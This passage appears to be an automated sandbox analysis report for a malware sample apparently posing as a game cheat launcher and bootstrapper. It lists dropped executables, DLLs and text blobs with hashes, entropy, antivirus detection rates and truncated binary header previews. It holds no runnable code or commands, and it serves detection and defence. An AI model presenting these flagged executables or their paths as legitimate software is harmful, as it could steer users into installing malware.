                                                  • Filename: 6tGWMkdYv4.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................v?..6.......?.. ....?...@.. ....................... @...........@...................................?.K.....?.......................@...................................................... ............... ..H............text....t?.. ...v?................. ..`.sdata.../....?..0...z?.............@....rsrc.........?.......?.............@..@.reloc........@.......?.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with very long lines (906), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):906
                                                  Entropy (8bit):5.923169329680243
                                                  Encrypted:false
                                                  SSDEEP:24:z/3L5Kl1QJM5DtD0ZU1Lezt1AgXkizpBsP+AfU2FZt:7AzdqJ1ASkilBsZfUCt
                                                  MD5:8D33ACB5EB75D3E60F13E0C972C0CEEE
                                                  SHA1:5D4F82CE70FDDAF04EBE4EB13E5652198BEFED41
                                                  SHA-256:0F1A79FF7EDFC31E9F2215B9BBDFE554EAA62DDAC8E4F49DF80ACE1F72561D25
                                                  SHA-512:985569891F9680087023238A2938561C9C96701AA206C3EF16F73661A7679D325EC3A25C57211F3BD47F4BB1961FE9C983111F66558F98C1C8C7EBC145F00FCA
                                                  Malicious:false
                                                  Preview:vEjeG8Q0o3Kkf4uMt61afNsEEoedyR2e3hF7pmQg9CsxQOU9eQcjQfYhVeZcexCXBpq7yxhHqUbcf4y0Te9hySOYIilKMxCLAUwkhXLqtU25D6BaqjJAxeisbSyPLX53SQcLIOS6STxeaSUMgKdmoCXfvEIPi5eWZ9nxd0ScRNreqESJ8msA3TPQ27ZDFCYXybEbpgtq2BVbV2yqw9R5MdcFtX5gaOWOyTqP91dc3CI18y49ItRFvcKU98rRkMQnpGmBMjq5fzCKVkH5c6Yr7QcWIVPBJM1qwfM1M3wiCWk6ZA9Y0vzoyjqYnP20UpvT7WYzXQtiJzokqg7IW0KYWM2MzyN6A5OWlQ8DmJBkCQf84FsHSuedfX7udLAjDwiNlR9Zh4fMzjVFr3StGGoQbv1NTNjbJbhPsRXmFSjXOSn5B1Dj2Rd7HRwzavGUUECYCGXagpnxgQCII5McKAi28kHbfiMTLPDJPP25dmDNnpa1PnrejoJUgKZc8648cTlRN222DR8h6VOSJQM10suhFtnEza6hsEuTDInWvybRqmXL6HTruDHujEMdOxDmUaz1k5OAmzGCRc0cVcIsHPxo79t96JH7vy6PxfkA2SE47FdGNtIwpUfFmK4lLPEdrIRdflp02I0yK2r1gnvMBVSaS1mml9znNlNyyAkmER3her5udCEid1bV00Ko8CO3SNkip2DgCJHtcu6l52Ji4QJVK287z6oBCAORGWFl9ifUur3F4jsF3q8BDOYx4FqGeGqbgoejxijVvzlc82DQNiHWBMO17Sq32ZznAbiPEJSVHnQNm5yBCa258UZUanle1pdVA8cgUxLEQvPY5AOBdp1bg3ppBOzbhxebJ4NodRrOPypMFBYaYjALyBzHTwfF7tgdRxPAxkiM8m
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with very long lines (415), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):415
                                                  Entropy (8bit):5.854320335191696
                                                  Encrypted:false
                                                  SSDEEP:12:M+7+CyAmL7rMLW+dpUGELEhYYHv1Ro6j7vj1n:MMryAe7m7PoLEhpHPpjrj1n
                                                  MD5:692A0B341AA5E3AD2BF3BA19F5CB3FD1
                                                  SHA1:CCF33A4D9122E2FFF8EFEA0DB677A3294184C2B8
                                                  SHA-256:60A07F3F387239881CA88E852A6F50C6FB7347F0BEA062B15E950CF697A2BD30
                                                  SHA-512:CDA1C00EFA57FDCBCD36E5812760574B460F64F8E54075BA996F30D99351604001D5B322A52B3DCD86AE444F59B9FC211E5E57C9A614489BE74906509B3D7E2B
                                                  Malicious:false
                                                  Preview:D7wTnHFFVqwlQfRM5SwXmxByMLyG30MePipjq7JH5rP1ZXVraBgSObwP68GbT8MeeRVszsg7Ipc4iJYz0Hp2U3Qyvams0rx6fuXHBn1sfiJj82rxjRlLTUKkBh6ZFyHa1gYxwQxMP7Wvtrz3szIjGlmLkwGeqcnrbtscd3ATdY6W7Y1UsDqPphUP3NMAKTgxTpTA9XazyzFrpQOM4wwnvXB3ZciQqAJK2JCRE0UUn1a0cmjn8AFXg2B5nZlgzJIyq5ygO6HDbbA47Lbw35Rq5vn9HGooPyfdsmKgyDYC3B6F2G8c8ym42c24RyYHRcym6hMUB580gOx4ziHBIMqbLlkQuPO9oRuaNTJU4oaC0wXop8FtrX9FvWaU66kwq9LOdWrfZwHdvnkZN6kwJfRRSpp02yX8DoW
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4173824
                                                  Entropy (8bit):7.8287711682156464
                                                  Encrypted:false
                                                  SSDEEP:98304:0YN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwc:0k550zE51GaDQGfo
                                                  MD5:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  SHA1:18AFFB87F0E996D202F0BE3B8109701120EA3995
                                                  SHA-256:F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
                                                  SHA-512:66830DA8515A32F3CF03149F0B23398265CBAD452BE1E81BFBAA2FB553E607AB498B2E6D2AF06D9EC840236C2FE7D964443ED4F2AB4D9E50BD07ECF1AA70335B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                  Joe Sandbox View:
                                                  • Filename: 6tGWMkdYv4.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................v?..6.......?.. ....?...@.. ....................... @...........@...................................?.K.....?.......................@...................................................... ............... ..H............text....t?.. ...v?................. ..`.sdata.../....?..0...z?.............@....rsrc.........?.......?.............@..@.reloc........@.......?.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4173824
                                                  Entropy (8bit):7.8287711682156464
                                                  Encrypted:false
                                                  SSDEEP:98304:0YN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwc:0k550zE51GaDQGfo
                                                  MD5:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  SHA1:18AFFB87F0E996D202F0BE3B8109701120EA3995
                                                  SHA-256:F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
                                                  SHA-512:66830DA8515A32F3CF03149F0B23398265CBAD452BE1E81BFBAA2FB553E607AB498B2E6D2AF06D9EC840236C2FE7D964443ED4F2AB4D9E50BD07ECF1AA70335B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                  Joe Sandbox View:
                                                  • Filename: 6tGWMkdYv4.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................v?..6.......?.. ....?...@.. ....................... @...........@...................................?.K.....?.......................@...................................................... ............... ..H............text....t?.. ...v?................. ..`.sdata.../....?..0...z?.............@....rsrc.........?.......?.............@..@.reloc........@.......?.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with very long lines (993), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):993
                                                  Entropy (8bit):5.909867240234343
                                                  Encrypted:false
                                                  SSDEEP:24:rXlrn4UXSUKlxARBG1bLUUP2UAcGCVqnNZuT8J/V:rlwxARB4LU22UHVqNQT8P
                                                  MD5:1D86C6559ADDED8C7D5B3124CE134871
                                                  SHA1:3E396BC7226DE0F65AB74155821B3BA86F8D44CF
                                                  SHA-256:BEDCA710F8E4D750344978FCC3B8CF268252A8B64630824CA327BC96E899287C
                                                  SHA-512:8AEE2BBC1C27EA6BA593DF91EB8CFC0CA725C2B6A4BDC0831B19A9E1639118260FFE36FFA8F180AD6783DA3DC4297933ECF68B5847A67B95DB1F80F60A90D1FD
                                                  Malicious:false
                                                  Preview:ZuOQXvzntxSgjWhvfk25fzez4P8POQc0DnpgJHYN4jxlo1SXTjjHIjejQZVHxjYdVcc5rAlYLpA5B2KD6k6pqUreJFQuvQaVKUQMYXqS8L6dijhXORLMntxBu8wlu0m5Opurm8pj4nqeXO5kh3feFOsbgPcakEiHjBO3yzvQmlS9DSnfDLD1VIzA6TLWfO8zFi4W9BvsIO1e5sXOm6XYArwbLO7foYuXmc4eXQgBZVtGQVEO56uj1jyXvdKuEQDted1cy30VZV9p8qK0JsjrnKfCogt4Fv7JS9mwdlZCGYKgkJZFSUlVqVFT7yySJ5QnYzW9EXXhThlOA9beGnmvKlc63SzowG2LIgIvwaA47DCIu0S8WUMgTedwWaFvisuMpaGe1qrpmryHjTMCA0Rc4W1oDVYWVPVOSzdUuyHqmg3lqVMCNCusaSRSicafSUUXVjyt01SMtlzYdP7rJVISenx9iKvSXmYSLfQHhdMVui8zd2zSetV6MC3rvyLpG9yHNhN790KpJwh5p8gpVcxoQbFJmiVsShPvu1m5p2ToiqxZe7CwRfUnLK1vbEVbebXmhwLyWlAcJJFkoqopfjawMmjj91ekh1KGSL2rvOaqe1dBERGuZp65AkZ4NlyfHa5S98Rdy73RIuSVJhfsutL15PFrv7eJa5jE5KCF9m6cwpwQSEvpGFuXOEXu2ks1dt0MKOZ8eZtIwsEQczYrLyDULLz0xSMY4F9CykGEoxKqWmkf9GRDMApoqgB8YiKMMVNrtCc2sUDYnW8jkT1qAJM4ZUWRiHpFm8eBY2w7oZU17RBTibXErdMDITSZpKTlo7vo27Ksh3BkyU6HTDtGtkYIwb2FkWReGtM9gWbkRphyclOyWKGmaM1Djm2bFFHKlheFH6l6mIzDDjqKMDsZQpD31Ja3dAfLiWM4HJqaiJARWyA95sOBXr36dkO8grdlnnfrXwCDXS0HpvgCIb8vvey0cQbh4r31qYotS
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4173824
                                                  Entropy (8bit):7.8287711682156464
                                                  Encrypted:false
                                                  SSDEEP:98304:0YN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwc:0k550zE51GaDQGfo
                                                  MD5:6CF5F23F1C8CA3BC6342506BAAC300DA
                                                  SHA1:18AFFB87F0E996D202F0BE3B8109701120EA3995
                                                  SHA-256:F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
                                                  SHA-512:66830DA8515A32F3CF03149F0B23398265CBAD452BE1E81BFBAA2FB553E607AB498B2E6D2AF06D9EC840236C2FE7D964443ED4F2AB4D9E50BD07ECF1AA70335B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 88%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................v?..6.......?.. ....?...@.. ....................... @...........@...................................?.K.....?.......................@...................................................... ............... ..H............text....t?.. ...v?................. ..`.sdata.../....?..0...z?.............@....rsrc.........?.......?.............@..@.reloc........@.......?.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\agentInto\fontsessionruntime.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1915
                                                  Entropy (8bit):5.363869398054153
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                                  MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                                  SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                                  SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                                  SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):1050
                                                  Entropy (8bit):5.3494375421744005
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeRE4Ks:MxHKLHKnYHKh3oPtHo6hAHKzeRHKs
                                                  MD5:741E4F1547EA86A558BB07C1C24FB1B0
                                                  SHA1:2E4AA5A266353C2782C429DB72F3E8667F7BA145
                                                  SHA-256:64C5BD2C308687466A86E91A3AC34474356243089AAD6698EB227E544D1AA7F5
                                                  SHA-512:35CC1F198E259A83CBDABD9FC8867FE3677A3B71AF11D178ECA4BF5E04E2ACCBBA1BD938AD32BE9569FBDD612C939E46352FBCAA35F890B014983F4F977B0DE4
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Cul
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                  MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                  SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                  SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                  SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                  Malicious:false
                                                  Preview:@...e................................................@..........
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):505919
                                                  Entropy (8bit):7.916019045449556
                                                  Encrypted:false
                                                  SSDEEP:12288:lAnPZEnsx4GdlKfMudIQ51CY6Zb++kcmkFH:WRYsGGPKfHj50YCbxk2H
                                                  MD5:538908E9DF9BEDB28AE22E3F4113FA99
                                                  SHA1:714DDF79197263B1E2C9B992EF861BA8183B15E2
                                                  SHA-256:AFC5F6F0924DA5E8E5833CD98E12908496EC20FEC5AA253B1FEF33FEAFE0DEDA
                                                  SHA-512:D05C73CD4F0FB8F867E2BA1DD59F62F88E63FDD1166B139971D6599CD584DF0880CEA0EA3A14E3649EF1AD4669D1CC5FBB974CAFD511F7A6A8082DFEB5809DCC
                                                  Malicious:false
                                                  Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.e...s.-KO...._.xo....#.x3.=3.4-._...)... \.+.9@..N.*....#.-.....{Wx..H...'...N.u.=.V.....\ke.so.n..+...3.....6...;=....g..NW..M...;L1a...Nqr.s...lE..H3....0..3-...h..F(~.z..b.@..K...(.{m ...4.yu.p.+.b..=.\(^.H.xn..GN.../w.yxI.......{.y..i...4.~~ ..>7....Pi..hf4~....?z.f.GO.....Gc.';..W..=..'.9.F~.DMs...g..&Dc.e...D.....;2....C%..##..o..h..P..:3.G.^ql~....|.......J.........L.5Z+.....}.\ka.#.......{jFv.w.6oi,.;.;...}..0...q..xw...]i$f...P.h.X'XsFc.;C.Cd.;.t>?.Gb\{.1?.]...1...C<.............Q.f.pO..]<c.....nM0...w..i..b..=L.Z..&.wb...[....o..-..b.%iN|...w.1......#.53.8.X.c.N]....r.G.9.........s....K.-...G6....'...R.fn}G..U<7.m-..-..........M.....Ds.Bc..kX..-.g....T7m......F.^Fb.g.uz...mzs..Vlt.x.F..oL..r-l....|D.....#.n.kj.m..wS".#....0~...Bs...|...}#..._W.m.9L...5s.Y.e.17..0....q.zt.X..uad...qNLu.8y 7s^....g^.uUh.{m.+.&.T......t...3.g.1....=
                                                  Process:C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):25165824
                                                  Entropy (8bit):3.3348510205585598
                                                  Encrypted:false
                                                  SSDEEP:196608:vrL/0tGurErvI9pWjgaAnajMsK23fQC//OoLxhw:EtGurEUWjJjYoo4jLxhw
                                                  MD5:68D3EA3AFA53DEDFD3593D140747B932
                                                  SHA1:757FF4EA1105BDCC861C98872CB28F3A32B170E9
                                                  SHA-256:97E31AE693F118965C81672374DFA269F2B5C3C2B9502AC983F8B5817D5D0002
                                                  SHA-512:B72ADB6EED395DB98F9BD3452C82252807320ED682CD585714FA4D526B6644EA873A62914F5FED2989FCF85F7B2E9472E37C2E3BBFB92867A2747CCEE8EF8048
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d...0.lf.........."....&.....v......@..........@......................................v...`.....................................................x....p..@....0...#....v.H$......X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc...@....p......................@..@.reloc..X............"..............@..B........................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\x4.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):11960320
                                                  Entropy (8bit):7.999234742000107
                                                  Encrypted:true
                                                  SSDEEP:196608:uHJv7g8MaX2ftjKAn9EVQODmgPaav5reiYS49zJu7pioQZBMPhk0u+Gnc3f5fM1R:YB7gIEj76VlD/is5rW79F8iFfcv5k1SQ
                                                  MD5:108590051FAB4871AF861B8B12AD1E96
                                                  SHA1:172D10992C078145E1439E85869DCEE89E95819B
                                                  SHA-256:7D11195746ED7866DCE67EBE82DD5C9BDC6F3251528A9D40C22BE61612F71D1A
                                                  SHA-512:27863D3991E490D69F199D8BF3EA521BEE1CFE18336FCF64960C5FA16CD4EC7FC7E4A74F4795B9FFEED194326F6F28DC800569B0E6F7D2BB8647D64F37C2D544
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q.....................n............... ....@.......................................................................... ..P.......@a........................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...@a.......b..................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4552800
                                                  Entropy (8bit):7.797999306287447
                                                  Encrypted:false
                                                  SSDEEP:98304:4byoaYN5zgov0Ev1wOj0EsDvoFt5mWZ1pegLaaDQojhfASjwcr:4Woak550zE51GaDQGfoa
                                                  MD5:2EDB71DD3792B6F6A774EDBF67BB78D2
                                                  SHA1:7A8CFF8359CAEC23A66212118CE4EDD1E239BFEB
                                                  SHA-256:9DAADD6E7CBD889A2A05FA94D2876710542332A79782CEC38C09E9079415B6AE
                                                  SHA-512:AA9BB70014A07B181960BD9EA1C1106F046F123F24A263C45AB58A461245E141A0AD3AF7D7B17E0CC59675FE1934F62A735756D52D068474690828FE6B44719F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Jun 21 03:46:02 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1372
                                                  Entropy (8bit):4.121727650374412
                                                  Encrypted:false
                                                  SSDEEP:24:HK2jq9s+fuXoUDfHWwKefNpihNII+ycuZhNVakSzPNnqS+d:edSVKCNgu1ulVa35qSe
                                                  MD5:9B1F636689514DFA7848183E06A99641
                                                  SHA1:FE3B6A866D054262EF714B187D4F963241F61ABA
                                                  SHA-256:31A1B16346BBB286266A3CA71AA5369A393171C7F4D3409B4DFCBF0C68C099B5
                                                  SHA-512:656E370304E600ED573E2C9C232C84C987CC0341B5A52BCBC5A522DC8E5843DFA74882DD8D42E7747012BBE14AF33DBE6E61CEEE82B3DEFF4B538DD77188BEB9
                                                  Malicious:false
                                                  Preview:L...z.tf.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\gkfhm5n3\CSCE3FF6834DD6C4DE392BB63A4482876F5.TMP...............ge....Jx.................4.......C:\Users\user\AppData\Local\Temp\RESDAF6.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.k.f.h.m.5.n.3...d.l.l.....(.....L.e.g.a.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):500712
                                                  Entropy (8bit):5.428454080870205
                                                  Encrypted:false
                                                  SSDEEP:12288:W/TcW1virB3ye+iKzORFNgeA+imQ9pRFZNIEJdIElxPrEIgcvLcglxMwCepM1STy:W/1C4I
                                                  MD5:851FEE9A41856B588847CF8272645F58
                                                  SHA1:EE185A1FF257C86EB19D30A191BF0695D5AC72A1
                                                  SHA-256:5E7FAEE6B8230CA3B97CE9542B914DB3ABBBD1CB14FD95A39497AAAD4C1094CA
                                                  SHA-512:CF5C70984CF33E12CF57116DA1F282A5BD6433C570831C185253D13463B0B9A0B9387D4D1BF4DDDAB3292A5D9BA96D66B6812E9D7EBC5EB35CB96EEA2741348F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<x.e.........." ..0..t..........v.... ........... ...............................1....`.................................$...O....................|...'.......................................................... ............... ..H............text...|r... ...t.................. ..`.rsrc................v..............@..@.reloc...............z..............@..B................X.......H...........p...................l........................................0..G.........()...};......}=......}>......}<......}:.....|;.....(...+..|;...(+...*..0..I..........(!....o.....8..o,... .@..3.r...p.s-...z.z..o,... ....3.r}..p.s-...z.z*........................,.......0../........{....- ..{....t....}.......r...p.s....z.{....*................."..}....*....0../........{....- ..{....t....}.......ry..p.s....z.{....*................."..}....*....0../........{....- ..{....t....
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38376
                                                  Entropy (8bit):6.289675546641707
                                                  Encrypted:false
                                                  SSDEEP:768:SNGbP6+wTftcZDgcEST3p4Jjrjh2jJFSUyauYv1JKia5/Zi/WGQKVu6bRaMBo0wx:OGm+otcZDgcEST3p4JjrjaJFSUyau01U
                                                  MD5:4CF94FFA50FD9BDC0BB93CCEAEDE0629
                                                  SHA1:3E30ECA720F4C2A708EC53FD7F1BA9E778B4F95F
                                                  SHA-256:50B2E46C99076F6FA9C33E0A98F0FE3A2809A7C647BB509066E58F4C7685D7E6
                                                  SHA-512:DC400518EF2F68920D90F1CE66FBB8F4DDE2294E0EFEECD3D9329AA7A66E1AB53487B120E13E15F227EA51784F90208C72D7FBFA9330D9B71DD9A1A727D11F98
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8............." ..0..d..........z.... ........... ..............................$.....`.................................(...O....................n...'..........D...8............................................ ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............l..............@..B................\.......H........7...E...........}..@............................................(....*..{....*>..}......}....*..{....*>..}......}....*..{....*>..}......}....*..{....*"..}....*..{....*>..}......}....*..{....*"..}....*...0..d........{....-K.(....-..(....-..(....-..(....,+..(.....(.....(.....(.......s....(....}.....{....%-.&.(...+*.0..C..........(....-..(.......(....,'.o.......(....o......(.......(....o ....*..0..B........#.......?}......}.....(!...}.....("....(b......(#.... . ...(#..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):45016
                                                  Entropy (8bit):6.2772249080704405
                                                  Encrypted:false
                                                  SSDEEP:768:1n/WlAKj4s0TV09797+nXDheteXBxc78OSW3Z8lcDP/ryEH0UBy4JjrD1h2j5h3E:1+msYXR3sZ8lcDP/ryEH0UBy4JjrD1aU
                                                  MD5:34EC990ED346EC6A4F14841B12280C20
                                                  SHA1:6587164274A1AE7F47BDB9D71D066B83241576F0
                                                  SHA-256:1E987B22CD011E4396A0805C73539586B67DF172DF75E3DDED16A77D31850409
                                                  SHA-512:B565015CA4B11B79ECBC8127F1FD40C986948050F1CAEFDD371D34ED2136AF0AABF100863DC6FD16D67E3751D44EE13835EA9BF981AC0238165749C4987D1AE0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
